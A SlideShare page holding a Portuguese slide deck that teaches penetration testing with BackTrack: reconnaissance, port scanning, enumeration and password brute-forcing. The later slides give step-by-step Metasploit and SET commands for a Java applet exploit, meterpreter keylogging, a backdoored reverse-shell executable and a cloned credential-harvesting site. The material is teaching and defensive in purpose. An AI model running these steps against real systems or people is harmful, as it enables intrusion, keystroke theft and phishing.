SlideShare uma empresa Scribd logo
1 de 58
Kleber Santos
Introdução
Introdução
O que é?
• Ferramenta voltada para testes de
penetração;
• Primeira versão lançada em 2006;
• Possui mais de 300 ferramentas para
tais testes;
Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi
removido, porém pode ser acessado através do link:

http://www.backtrack-linux.org/
Introdução
Uso em Certificações

• Todas oferecidas pela Offensive Security que
mantém o BackTrack.
Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi
removido, porém pode ser acessado através do link:

http://www.backtrackbrasil.com.br/site/vd/
Pentest
•
•
•
•

Metodologia para testes de penetração;
Simula ataques;
Verifica a segurança de um sistema;
Possibilita criação de mecanismos de
defesa;
Pentest
• Procedimentos divididos em cinco etapas:
1.
2.
3.
4.
5.

Obtenção de informações do alvo;
Varreduras de sistema;
Ganho de acesso ao sistema;
Mantendo o acesso ao sistema;
Retirada de evidencias;

• Abordaremos as três primeiras etapas
divididas em quatro partes;
Pentest
• Procedimentos divididos em cinco etapas:
1.
2.
3.
4.
5.

Obtenção de informações do alvo;
Varreduras de sistema;
Ganho de acesso ao sistema;
Mantendo o acesso ao sistema;
Retirada de evidencias;

• Abordaremos as três primeiras etapas
divididas em quatro partes;
Primeira Parte
•
•
•
•

Obtenção de Informação;
Detecção de Sistemas Ativos;
Técnica Para Obter Informações DNS;
FINGERPRINT;
Obtenção de Informação
• Metodologia usada para "reconhecimento do
terreno";

• Pode ser de forma:
 passiva (recursos na internet);
 ativa (engenharia social);
Detecção de
Sistemas Ativos
• Princípios básicos na obtenção de
informações;
• PING detecta hosts ativos;
Detecção de
Sistemas Ativos
FPING:
 Executa ping para diferentes hosts ao
mesmo tempo através de um *.txt;

HPING3:
 Detecta hosts, regras de firewall e realiza
varreduras de portas;

Genlist:
 Verifica uma lista de hosts ativos;
Informações DNS
• DNS traduz endereços de IP em
nomes de domínio;
• A ferramenta nslookup permite obter
informações sobre DNS;
Informações DNS
DNSENUM:
 Pesquisa de hosts, nomes de servidores, registros MX, IPs,
etc.
DNSMAP:
 Descobre subdomínios relacionados ao domínio-alvo.
Acompanha wordlist;
DNSRECON:
 Permite consultas reversas por faixas de IP, NS, SOA, registros
MX, transferências de zonas e enumeração de serviços;
FIERCE:
 Retorna informações adicionais como HINFO, especificando o
processador da máquina e o servidor;
FINGERPRINT
• Técnica na qual se obtém informações
sobre sistema operacional;
• O NMAP é utilizado para tal checagem
de versões;

root@bt~# nmap –O <ip_do_alvo>
FINGERPRINT
TCP SYN (-sS)
 examina portas de maneira rápida e difícil de
ser detectado por firewalls ou IDS;
TCP Connect (-sT)
 executa varredura utilizando o Three-Way
Handshake;
UDP (-sU)
 possibilita varredura do protocolo UDP;
FINGERPRINT
TCP FIN (-sF, -sX, -sN)
 utilizados na tentativa de travessia de
firewalls;
TCP ACK (-sA)
 tática utilizada para detecção de regras de
firewall;
TCP Windows (-sW)
 varreduras por janelas, parecido com o método
ACK, porém consegue detectar portas abertas
versus filtradas e não filtradas;
Segunda Parte
• SCANNING de portas
• Detecção de Sistemas Ativos;
• NETCAT – Canivete Suíço;
SCANNING de portas
• Port Scan é a técnica usada para descobrir
serviços vulneráveis em um sistema;
Scanning de portas:
 identifica portas ativas;
De vulnerabilidades:
 identifica fraquezas no sistema;

De redes:
 identifica os hosts ativos;
Detecção de Sistemas Ativos
NETCAT – Canivete Suíço
• Outra ferramenta possível para
varreduras num host;
root@root:~# nc -v -z 192.168.32.128 1-4000
Terceira Parte
• Fase de Enumeração;
• HTTPRINT;
• AMAP, SMTP e SMTPSCAN;
Fase de Enumeração
• Nesta fase o invasor tenta obter:





nomes de máquinas;
usuários;
serviços e versões;
compartilhamentos, etc;

• A ferramenta Nbtscan nos permite obter
nome e endereço MAC de um alvo;
Fase de Enumeração
• Através do nmap podemos executar
varredura procurando por serviços que
utilizem o protocolo UDP:
root@root~# nmap –T4 –sU –sV
<ip_host_alvo>
Fase de Enumeração
• Obtendo retorno de serviços snmp
podemos obter informações SNMP
com o Snmpcheck:
root@root:/pentest/enumeration/sn
mp/snmpcheck# ./snmpcheck-1.8.pl
–t <ip_host_alvo>
HTTPRINT
• Possibilita detectar versões de
servidores;
• Fornece opção de exporta-las para
arquivos *.html, *.csv ou *.xml
AMAP, SMTP e SMTPSCAN
AMAP

 tenta identificar aplicações rodando em
portas diferentes da usual.
SMTP e SMTPScan

 busca usuários válidos do nosso host,
destinando um IP alvo;
Quarta Parte
• Ganho de Acesso;
• Abordagem à Força Bruta;
• SET e Metasploit;
Ganho de Acesso
• Utiliza de ferramentas que explorem
serviços como FTP e SSH;
• Explora vulnerabilidades e senhas;
• A técnica de engenharia social é
extremamente importante em tal etapa;
Força Bruta
xHydra ou Hidra-GTK
 Ferramenta utilizada para quebra de senhas
ONLINE;
 Suporta diversos protocolos;
 Permite utilização de arquivos auxiliares
para listas de usuários e senhas (wordlists);
Força Bruta
• Dicionários e força bruta são técnicas
utilizadas para o password cracking;
• Outras ferramentas para o mesmo intuito
são:
 Medusa;
 John The Ripper;
Todas elas inclusas no BackTrack 5 R3;
Invadindo Sistemas com
SET e Metasploit
Metasploit
 Conta com uma interface gráfica
ARMITAGE e também a linha de
comando, MSFCONSOLE;
SET
 Tem como alvo fraquezas e estupidez
humanas;
Invadindo Sistemas com
SET e Metasploit
• Através do comando msfconsole
acessamos o Metasploit via linha de
comando;
• Configuraremos nossa máquina
BackTrack para receber informações
do alvo através de uma vulnerabilidade
do Java;
Invadindo Sistemas com
SET e Metasploit
Invadindo Sistemas com
SET e Metasploit
• root@bt:~# msfconsole
• root@bt:~# search java
• root@bt:~# use
exploit/multi/browser/java_sign
ed_applet
• root@bt:~# show options
Invadindo Sistemas com
SET e Metasploit
set srvhost <ip_local_host_backTrack>
set srvport 80
#seta a porta 80 como acesso
set uripath <caminho_para_link_url>
set appletname <nome_para_o_arquivo_jar>
exploit
Invadindo Sistemas com
SET e Metasploit
• Após acessar a URL gerada o alvo
permitirá acesso ao invasor;

sessions –i 1
# dá acesso à máquina alvo
sysinfo
# obtém informações da máquina
alvo
Invadindo Sistemas com
SET e Metasploit
help
# lista comandos do METERPRETER
screenshot
# obtém um print da tela da
máquina invadida
Invadindo Sistemas com
SET e Metasploit
keyscan_start
# starta um sniffer para captura
de navegação
keyscan_dump
# exibe informações capturadas
Invadindo Sistemas com
SET e Metasploit
• Técnica semelhante pode ser
explorada através da ferramenta SET
gerando-se um payload;
• Ao acessar a ferramenta, navega-se
em:

1 – Social Engineering Attacks;
4 – Create a Payload na Listener;
Invadindo Sistemas com
SET e Metasploit
• Deve-se informar o IP da máquina que
receberá as informações obtidas através
do payload (IP da máquina BackTrack);
• Feito isso, navega-se em:
2 – Windows Reverse TCP Meterpreter;
16 – Backdoored Executable (BEST);
Invadindo Sistemas com
SET e Metasploit
• Após informar a porta solicitada, ele gerará o
arquivo executável:
/pentest/exploits/set msf.exe
• Confirma-se com yes o start do listener;
• O acesso à máquina alvo se dará após a
execução do arquivo pela mesma e
executando:
sessions –i 1.
Invadindo Sistemas com
SET e Metasploit
• Com a mesma ferramenta SET,
podemos clonar páginas web para
obter informações de uma vítima
através das opções:
1
2
3
2

–
–
–
–

Social Engineering Attacks;
Website Attack Vectors;
Credential Harvester Attack Vectors;
Site Cloner;
Invadindo Sistemas com
SET e Metasploit
• Informa-se a URL do site a ser
clonado;
• Acessa-se através do IP da máquina
do atacante;
Obs.: Podemos atribuir um domínio ao IP para
facilitar o acesso pela vítima;
Conclusão
• Técnicas de invasão estão
diretamente atreladas às
vulnerabilidades dos sistemas e das pessoas
Conclusão
•
•
•
•
•

Configurar devidamente servidores;
Atualizar devidamente SOs e SWs;
Utilização de senhas fortes;
Desconfiar de coisas óbvias;
Usufruir de uma política de segurança;
Conclusão
• Atentar à boas práticas voltadas
à segurança nos dá uma garantia quanto
ao CID;
klebernox.wordpress.com/backtrackabordagem-a-seguranca-em-redes/
Obrigado !
Back track   apresentação

Mais conteúdo relacionado

Mais procurados

Segurança da Informação - Firewall OpenBSD PF
Segurança da Informação - Firewall OpenBSD PFSegurança da Informação - Firewall OpenBSD PF
Segurança da Informação - Firewall OpenBSD PFLuiz Arthur
 
Aula 8.1 - Iptables tabela Filter
Aula 8.1 - Iptables tabela FilterAula 8.1 - Iptables tabela Filter
Aula 8.1 - Iptables tabela FilterAndrei Carniel
 
Aula 8.3 - Iptables Tabela NAT
Aula 8.3 - Iptables Tabela NATAula 8.3 - Iptables Tabela NAT
Aula 8.3 - Iptables Tabela NATAndrei Carniel
 
Introdução a Redes de Computadores - 9 - Nível de Rede - IP (p1)
Introdução a Redes de Computadores - 9 - Nível de Rede - IP (p1)Introdução a Redes de Computadores - 9 - Nível de Rede - IP (p1)
Introdução a Redes de Computadores - 9 - Nível de Rede - IP (p1)Andre Peres
 
Segurança de Dados e Informações - Aula 5 - Firewall | Iptables
Segurança de Dados e Informações - Aula 5 - Firewall | IptablesSegurança de Dados e Informações - Aula 5 - Firewall | Iptables
Segurança de Dados e Informações - Aula 5 - Firewall | IptablesMinistério Público da Paraíba
 
Servidor de internet (NAT, Squid, Sarg)
Servidor de internet (NAT, Squid, Sarg)Servidor de internet (NAT, Squid, Sarg)
Servidor de internet (NAT, Squid, Sarg)Danilo Filitto
 
Entendendo como fazer um firewall pessoal
Entendendo como fazer um firewall pessoalEntendendo como fazer um firewall pessoal
Entendendo como fazer um firewall pessoalAlmir Mendes
 
Gerenciamento de Servidores Linux utilizando SNMP
Gerenciamento de Servidores Linux utilizando SNMPGerenciamento de Servidores Linux utilizando SNMP
Gerenciamento de Servidores Linux utilizando SNMPAndré Déo
 
5 - segurança - firewall
5  - segurança - firewall5  - segurança - firewall
5 - segurança - firewallAndre Peres
 
Seguranca informacao 1
Seguranca informacao 1Seguranca informacao 1
Seguranca informacao 1Nauber Gois
 
Iptables Completo Oliver
Iptables   Completo   OliverIptables   Completo   Oliver
Iptables Completo Olivermarcosserva
 
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei PollonFerramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei PollonTchelinux
 

Mais procurados (19)

Segurança da Informação - Firewall OpenBSD PF
Segurança da Informação - Firewall OpenBSD PFSegurança da Informação - Firewall OpenBSD PF
Segurança da Informação - Firewall OpenBSD PF
 
Aula 8.1 - Iptables tabela Filter
Aula 8.1 - Iptables tabela FilterAula 8.1 - Iptables tabela Filter
Aula 8.1 - Iptables tabela Filter
 
Aula 8.3 - Iptables Tabela NAT
Aula 8.3 - Iptables Tabela NATAula 8.3 - Iptables Tabela NAT
Aula 8.3 - Iptables Tabela NAT
 
Introdução a Redes de Computadores - 9 - Nível de Rede - IP (p1)
Introdução a Redes de Computadores - 9 - Nível de Rede - IP (p1)Introdução a Redes de Computadores - 9 - Nível de Rede - IP (p1)
Introdução a Redes de Computadores - 9 - Nível de Rede - IP (p1)
 
Segurança de Dados e Informações - Aula 5 - Firewall | Iptables
Segurança de Dados e Informações - Aula 5 - Firewall | IptablesSegurança de Dados e Informações - Aula 5 - Firewall | Iptables
Segurança de Dados e Informações - Aula 5 - Firewall | Iptables
 
Servidor de internet (NAT, Squid, Sarg)
Servidor de internet (NAT, Squid, Sarg)Servidor de internet (NAT, Squid, Sarg)
Servidor de internet (NAT, Squid, Sarg)
 
MRTG - SNMP na Prática
MRTG - SNMP na PráticaMRTG - SNMP na Prática
MRTG - SNMP na Prática
 
Unidade 2.2.1 nmap
Unidade 2.2.1 nmapUnidade 2.2.1 nmap
Unidade 2.2.1 nmap
 
Comando Traceroute
Comando TracerouteComando Traceroute
Comando Traceroute
 
Apostila firewall-consulta
Apostila firewall-consultaApostila firewall-consulta
Apostila firewall-consulta
 
Entendendo como fazer um firewall pessoal
Entendendo como fazer um firewall pessoalEntendendo como fazer um firewall pessoal
Entendendo como fazer um firewall pessoal
 
Gerenciamento de Servidores Linux utilizando SNMP
Gerenciamento de Servidores Linux utilizando SNMPGerenciamento de Servidores Linux utilizando SNMP
Gerenciamento de Servidores Linux utilizando SNMP
 
5 - segurança - firewall
5  - segurança - firewall5  - segurança - firewall
5 - segurança - firewall
 
Seguranca informacao 1
Seguranca informacao 1Seguranca informacao 1
Seguranca informacao 1
 
Iptables Completo Oliver
Iptables   Completo   OliverIptables   Completo   Oliver
Iptables Completo Oliver
 
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei PollonFerramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
Ferramentas GPL para a segurança de Redes de Computadores - Vanderlei Pollon
 
Comandos ip-de-redes-no-windows-1319-ory76a
Comandos ip-de-redes-no-windows-1319-ory76aComandos ip-de-redes-no-windows-1319-ory76a
Comandos ip-de-redes-no-windows-1319-ory76a
 
Pratica3 redes
Pratica3 redesPratica3 redes
Pratica3 redes
 
Iptables Básico
Iptables BásicoIptables Básico
Iptables Básico
 

Semelhante a Back track apresentação

Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univemevandrovv
 
I Workshop de Redes do Iespes
I Workshop de Redes do IespesI Workshop de Redes do Iespes
I Workshop de Redes do Iespesluizfelipemz
 
Segurança em servidores Linux
Segurança em servidores LinuxSegurança em servidores Linux
Segurança em servidores LinuxImpacta Eventos
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesAlisson Fuckner
 
Ferramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei PollonFerramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei PollonTchelinux
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesBruno Alexandre
 
Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploitRoberto Soares
 
Curso hacking com BT5
Curso hacking com BT5Curso hacking com BT5
Curso hacking com BT5Cassio Ramos
 
Administração de Rede Local
Administração de Rede LocalAdministração de Rede Local
Administração de Rede Localcymbron
 
Nmap Avaliando Rede Em Ambiente Linux
Nmap  Avaliando Rede Em Ambiente LinuxNmap  Avaliando Rede Em Ambiente Linux
Nmap Avaliando Rede Em Ambiente Linux987123987123
 
Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de RedesDisciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de RedesRogério Almeida
 
Seguranca em Servidores Linux
Seguranca em Servidores LinuxSeguranca em Servidores Linux
Seguranca em Servidores LinuxAlessandro Silva
 

Semelhante a Back track apresentação (20)

Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univem
 
Aula 8.0 - Segurança
Aula 8.0 - SegurançaAula 8.0 - Segurança
Aula 8.0 - Segurança
 
I Workshop de Redes do Iespes
I Workshop de Redes do IespesI Workshop de Redes do Iespes
I Workshop de Redes do Iespes
 
Segurança em servidores Linux
Segurança em servidores LinuxSegurança em servidores Linux
Segurança em servidores Linux
 
Apresentacao Aula03 So
Apresentacao Aula03 SoApresentacao Aula03 So
Apresentacao Aula03 So
 
Automatizando Nmap com NSE
Automatizando Nmap com NSEAutomatizando Nmap com NSE
Automatizando Nmap com NSE
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
 
Ferramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei PollonFerramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei Pollon
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploit
 
Cacti
CactiCacti
Cacti
 
Curso hacking com BT5
Curso hacking com BT5Curso hacking com BT5
Curso hacking com BT5
 
Administração de Rede Local
Administração de Rede LocalAdministração de Rede Local
Administração de Rede Local
 
Nmap Avaliando Rede Em Ambiente Linux
Nmap  Avaliando Rede Em Ambiente LinuxNmap  Avaliando Rede Em Ambiente Linux
Nmap Avaliando Rede Em Ambiente Linux
 
Ntop
NtopNtop
Ntop
 
Netfilter + Iptables
Netfilter + IptablesNetfilter + Iptables
Netfilter + Iptables
 
Squid proxy
Squid proxySquid proxy
Squid proxy
 
Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de RedesDisciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
Disciplina_Redes e Segurança de Sistemas - Mapeamento de Redes
 
Seguranca em Servidores Linux
Seguranca em Servidores LinuxSeguranca em Servidores Linux
Seguranca em Servidores Linux
 

Back track apresentação

  • 2.
  • 3.
  • 5. Introdução O que é? • Ferramenta voltada para testes de penetração; • Primeira versão lançada em 2006; • Possui mais de 300 ferramentas para tais testes;
  • 6. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrack-linux.org/
  • 7. Introdução Uso em Certificações • Todas oferecidas pela Offensive Security que mantém o BackTrack.
  • 8. Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link: http://www.backtrackbrasil.com.br/site/vd/
  • 9. Pentest • • • • Metodologia para testes de penetração; Simula ataques; Verifica a segurança de um sistema; Possibilita criação de mecanismos de defesa;
  • 10. Pentest • Procedimentos divididos em cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  • 11. Pentest • Procedimentos divididos em cinco etapas: 1. 2. 3. 4. 5. Obtenção de informações do alvo; Varreduras de sistema; Ganho de acesso ao sistema; Mantendo o acesso ao sistema; Retirada de evidencias; • Abordaremos as três primeiras etapas divididas em quatro partes;
  • 12. Primeira Parte • • • • Obtenção de Informação; Detecção de Sistemas Ativos; Técnica Para Obter Informações DNS; FINGERPRINT;
  • 13. Obtenção de Informação • Metodologia usada para "reconhecimento do terreno"; • Pode ser de forma:  passiva (recursos na internet);  ativa (engenharia social);
  • 14. Detecção de Sistemas Ativos • Princípios básicos na obtenção de informações; • PING detecta hosts ativos;
  • 15.
  • 16. Detecção de Sistemas Ativos FPING:  Executa ping para diferentes hosts ao mesmo tempo através de um *.txt; HPING3:  Detecta hosts, regras de firewall e realiza varreduras de portas; Genlist:  Verifica uma lista de hosts ativos;
  • 17. Informações DNS • DNS traduz endereços de IP em nomes de domínio; • A ferramenta nslookup permite obter informações sobre DNS;
  • 18.
  • 19. Informações DNS DNSENUM:  Pesquisa de hosts, nomes de servidores, registros MX, IPs, etc. DNSMAP:  Descobre subdomínios relacionados ao domínio-alvo. Acompanha wordlist; DNSRECON:  Permite consultas reversas por faixas de IP, NS, SOA, registros MX, transferências de zonas e enumeração de serviços; FIERCE:  Retorna informações adicionais como HINFO, especificando o processador da máquina e o servidor;
  • 20. FINGERPRINT • Técnica na qual se obtém informações sobre sistema operacional; • O NMAP é utilizado para tal checagem de versões; root@bt~# nmap –O <ip_do_alvo>
  • 21. FINGERPRINT TCP SYN (-sS)  examina portas de maneira rápida e difícil de ser detectado por firewalls ou IDS; TCP Connect (-sT)  executa varredura utilizando o Three-Way Handshake; UDP (-sU)  possibilita varredura do protocolo UDP;
  • 22. FINGERPRINT TCP FIN (-sF, -sX, -sN)  utilizados na tentativa de travessia de firewalls; TCP ACK (-sA)  tática utilizada para detecção de regras de firewall; TCP Windows (-sW)  varreduras por janelas, parecido com o método ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;
  • 23. Segunda Parte • SCANNING de portas • Detecção de Sistemas Ativos; • NETCAT – Canivete Suíço;
  • 24. SCANNING de portas • Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema; Scanning de portas:  identifica portas ativas; De vulnerabilidades:  identifica fraquezas no sistema; De redes:  identifica os hosts ativos;
  • 26. NETCAT – Canivete Suíço • Outra ferramenta possível para varreduras num host; root@root:~# nc -v -z 192.168.32.128 1-4000
  • 27. Terceira Parte • Fase de Enumeração; • HTTPRINT; • AMAP, SMTP e SMTPSCAN;
  • 28. Fase de Enumeração • Nesta fase o invasor tenta obter:     nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc; • A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;
  • 29. Fase de Enumeração • Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP: root@root~# nmap –T4 –sU –sV <ip_host_alvo>
  • 30. Fase de Enumeração • Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck: root@root:/pentest/enumeration/sn mp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>
  • 31. HTTPRINT • Possibilita detectar versões de servidores; • Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml
  • 32.
  • 33.
  • 34. AMAP, SMTP e SMTPSCAN AMAP  tenta identificar aplicações rodando em portas diferentes da usual. SMTP e SMTPScan  busca usuários válidos do nosso host, destinando um IP alvo;
  • 35. Quarta Parte • Ganho de Acesso; • Abordagem à Força Bruta; • SET e Metasploit;
  • 36. Ganho de Acesso • Utiliza de ferramentas que explorem serviços como FTP e SSH; • Explora vulnerabilidades e senhas; • A técnica de engenharia social é extremamente importante em tal etapa;
  • 37. Força Bruta xHydra ou Hidra-GTK  Ferramenta utilizada para quebra de senhas ONLINE;  Suporta diversos protocolos;  Permite utilização de arquivos auxiliares para listas de usuários e senhas (wordlists);
  • 38. Força Bruta • Dicionários e força bruta são técnicas utilizadas para o password cracking; • Outras ferramentas para o mesmo intuito são:  Medusa;  John The Ripper; Todas elas inclusas no BackTrack 5 R3;
  • 39. Invadindo Sistemas com SET e Metasploit Metasploit  Conta com uma interface gráfica ARMITAGE e também a linha de comando, MSFCONSOLE; SET  Tem como alvo fraquezas e estupidez humanas;
  • 40. Invadindo Sistemas com SET e Metasploit • Através do comando msfconsole acessamos o Metasploit via linha de comando; • Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;
  • 42. Invadindo Sistemas com SET e Metasploit • root@bt:~# msfconsole • root@bt:~# search java • root@bt:~# use exploit/multi/browser/java_sign ed_applet • root@bt:~# show options
  • 43. Invadindo Sistemas com SET e Metasploit set srvhost <ip_local_host_backTrack> set srvport 80 #seta a porta 80 como acesso set uripath <caminho_para_link_url> set appletname <nome_para_o_arquivo_jar> exploit
  • 44. Invadindo Sistemas com SET e Metasploit • Após acessar a URL gerada o alvo permitirá acesso ao invasor; sessions –i 1 # dá acesso à máquina alvo sysinfo # obtém informações da máquina alvo
  • 45. Invadindo Sistemas com SET e Metasploit help # lista comandos do METERPRETER screenshot # obtém um print da tela da máquina invadida
  • 46. Invadindo Sistemas com SET e Metasploit keyscan_start # starta um sniffer para captura de navegação keyscan_dump # exibe informações capturadas
  • 47. Invadindo Sistemas com SET e Metasploit • Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload; • Ao acessar a ferramenta, navega-se em: 1 – Social Engineering Attacks; 4 – Create a Payload na Listener;
  • 48. Invadindo Sistemas com SET e Metasploit • Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack); • Feito isso, navega-se em: 2 – Windows Reverse TCP Meterpreter; 16 – Backdoored Executable (BEST);
  • 49. Invadindo Sistemas com SET e Metasploit • Após informar a porta solicitada, ele gerará o arquivo executável: /pentest/exploits/set msf.exe • Confirma-se com yes o start do listener; • O acesso à máquina alvo se dará após a execução do arquivo pela mesma e executando: sessions –i 1.
  • 50. Invadindo Sistemas com SET e Metasploit • Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções: 1 2 3 2 – – – – Social Engineering Attacks; Website Attack Vectors; Credential Harvester Attack Vectors; Site Cloner;
  • 51. Invadindo Sistemas com SET e Metasploit • Informa-se a URL do site a ser clonado; • Acessa-se através do IP da máquina do atacante; Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;
  • 52. Conclusão • Técnicas de invasão estão diretamente atreladas às vulnerabilidades dos sistemas e das pessoas
  • 53. Conclusão • • • • • Configurar devidamente servidores; Atualizar devidamente SOs e SWs; Utilização de senhas fortes; Desconfiar de coisas óbvias; Usufruir de uma política de segurança;
  • 54. Conclusão • Atentar à boas práticas voltadas à segurança nos dá uma garantia quanto ao CID;
  • 55.